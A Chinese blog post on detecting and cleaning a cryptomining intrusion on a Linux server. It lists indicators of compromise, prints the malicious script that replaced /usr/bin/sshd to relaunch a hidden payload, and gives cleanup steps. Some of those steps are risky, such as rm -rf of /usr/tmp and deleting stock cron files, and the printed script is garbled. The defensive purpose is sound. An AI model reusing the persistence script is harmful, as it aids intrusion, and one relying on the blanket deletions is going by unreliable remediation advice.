root用户登录出现 -bash-4.2
[TOC]
在修复过.bashrc文件或者恢复过.bashrc后,仍然出现-bash-4.2#,那么有可能你的机器已经被入侵了,附上我遇到的这种情况,看看对你有没有帮助。
1、确认是否被入侵
出现以下现象或存在以下目录
- root用户登录出现 -bash-4.2#
- netstat 命令回显为空
- crontab -l 查看系统定时任务
- 检查系统用户列表是否有 gh0stx, sclipicibosu, mexalzsherifu 三个或其中任意一个
- 查看是否存在/var/tmp/.ladyg0g0/目录
- 查看是否存在/var/tmp/.sl/目录
-
检查/root/.ssh/authorized_keys是否存在异常
-
查看是否存在/usr/.SQL-Unix/.SQL/.db 或者 /var/tmp/.SQL-Unix/.SQL/.db
-
查看是否存在/usr/tmp/.ladyg0g0/.pr1nc35 或者 /var/tmp/.ladyg0g0/.pr1nc35
-
查看是否存在/usr/bin/.pidsclip
-
查看是否存在/usr/bin/.locationesclipiciu
-
检查/usr/bin/sshd 内容是否是如下代码段
1 2 3 4 5 6 7 8 9 10 11 12 13
#!/bin/bash locatieasdf=$(cat /usr/bin/.locationesclipiciu) if [ ! -d ]; then mkdir rsync -r /usr/bin/.locationesclipiciu/ / sleep 1 /.b4nd1d0 > /dev/null 2>&1 & disown else if [ ! -f /.dorel ]; then rsync -r /usr/bin/.locationesclipiciu/ / sleep 1 /.b4nd1d0 > /dev/null 2>&1 & disown fi
2、威胁处理
删除恶意脚本
-
强制删除 /var/tmp/.sl/ 目录
-
强制删除 /var/tmp/.ladyg0g0/ 目录
-
强制删除 /usr/bin/.locationesclipiciu
-
强制删除 /usr/bin/.pidsclip
-
强制删除 /root/.b4nd1d0
-
强制删除 /root/.dorel
-
强制删除 /usr/.SQL-Unix/ 目录
-
强制删除 /usr/tmp 目录
-
强制删除 /usr/bin/sshd
-
删除 /etc/cron.daily/man-db.cron
-
删除/etc/cron.hourly/0anacron
-
检查异常SSH公钥,排查~/.ssh/authorized_keys文件,如果发现可疑的SSH公钥,直接删除
-
rm -rf /usr/lib/systemd/system/myservice.service
-
恢复.bashrc文件 cp /etc/skel/.bash* /root/
-
修改/root/.bashrc文件
1
export PS1='[\u@\h \W]\$'
-
删除 gh0stx, sclipicibosu, mexalzsherifu 中存在的用户
1 2 3 4
vim /etc/passwd // 删除存在得用户 vim /etc/shadow // 删除存在的用户 userdel –r sclipicibosu//删除不成功就使用chmod修改/etc/passwd和/etc/shadow权限,再使用vim删除该用户 -
reboot重启
-
passwd //修改密码为强口令
3、恶意脚本分析
- 往系统服务中注册了一个私有服务 /lib/systemd/system/myservice.service
- myservice私有服务中进行了一个文件同步操作 rsync -r /usr/bin/.locationesclipiciu/
- 同步了 /var/tmp/.sl/ 下的内容
- 重写.bashrc,导致常用命令失效
- 后续可能进行的行为暂时不明
4、参考文章
腾讯主机安全截获TOPMiner挖矿木马,受害服务器约1.5万台 (tencent.com)
How We Tracked a Threat Group Running an Active Cryptojacking Campaign (bitdefender.com)
home (urdr-gungnir.github.io) home (urdr-gungnir.github.io)
